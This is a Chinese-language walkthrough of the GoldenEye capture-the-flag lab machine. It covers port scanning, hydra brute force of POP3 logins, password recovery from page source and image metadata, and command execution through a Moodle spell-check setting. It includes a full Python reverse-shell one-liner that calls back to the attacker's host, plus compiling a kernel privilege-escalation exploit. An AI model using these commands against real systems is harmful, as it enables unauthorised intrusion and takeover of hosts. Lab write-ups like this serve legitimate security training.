GoldenEye

netdiscover -r 192.168.133.0找到靶机
nmap -p- 192.168.133.220扫描全端口,发现只有几个端口开放

图片.png

访问80端口


图片.png

根据他的提示去/sev-home/路径下,发现是登录的界面,但是并没有账号密码,只能回去继续看默认页面了

F12发现存在一个terminal.js文件,查看文件内容,是吧对应的密码进行html编码了,InvincibleHack3r这个就是对应的密码,然后根据上面的内容,用boris登陆

tiip

登陆成功之后,给了下一个提示,f12查看源代码,发现最底下的注释,提示了用户名


图片.png
图片.png

我们可以知道55006 55007其中一个有可能是pop3端口,使用nc连接55007端口,根据回显消息看到pop3的字样

图片.png

接下来用haydra进行爆破,使用kali自带的密码字典(别问为什么,我也不知道,网上抄的。。。),命令如下
hydra -s 55007 -L uname.txt -P /usr/share/wordlists/fasttrack.txt -t 64 192.168.133.222 pop3

找到两个用户的账号密码了。

图片.png

接下来利用得到的用户名密码登入系统


图片.png
USER boris(通过该命令输入用户名boris)
PASS secret1! (使用该命令输入用户的密码。之后,我们从目标计算机收到了登陆成功的消息,说明已在目标系统上成功通过了身份验证)
LIST(用于显示目标系统上所有可用的电子邮件)
RETR ID_number (用来查看指定ID的电子邮件)

看到第二封邮件的时候发现给了提示


图片.png

然后修改自己本地的HOSTS文件

图片.png

用刚才邮件中提到的那个账号密码登陆,登进去之后下面显示有发送邮件提示,点进去看看

图片.png

得知了用户名,接着爆破一波?拿到了用户名密码,登陆上去,在主页发现管理员用户名admin,密码不知道

继续点着看看,发现一个TXT文件

图片.png

看到一个路径,看看下载下来是什么,一张jpg图片,作为一个多年的MISC狗第一反应就是看详细信息

图片.png

发现base64的字符串,解码一下看看,结果为xWinter1995x!

可能这就是之前admin用户的密码??试了一下竟然对了~

图片.png

进去之后发现在编辑的页面发现版本号,求助google了

图片.png

然后发现一个貌似能执行命令的地方,先去编辑器处将默认的改为PSpellShell

图片.png

然后返回之前执行命令那个地方

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.133.206",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然后需要调用系统的拼写检查,从而让系统执行我们对应的命令

图片.png

已经弹回shell了


图片.png

查看当前权限和内核版本


图片.png

在kali里面搜一波


图片.png

目标机器里面没有gcc,先修改c文件,直接把里面的gcc修改成cc即可

图片.png
补充一下:
cc是Unix的C编译器,全程为c compiler,而gcc为Linux的,全称为GNU compiler collection,是一个编译器集合,既可以编译c也可以编译c++.

用python的简单文件服务器,传到靶机上去
python -m SimpleHTTPServer 8999

然后编译执行一把梭

cc 37292.c -o exp
chmod 777 exp
./exp
图片.png

直接去root家目录读flag


图片.png

最后还有一个彩蛋,优秀


图片.png

使用msf提权,简单写写,只是为了试试好不好使

图片.png

图片.png

图片.png

你可能感兴趣的:(GoldenEye)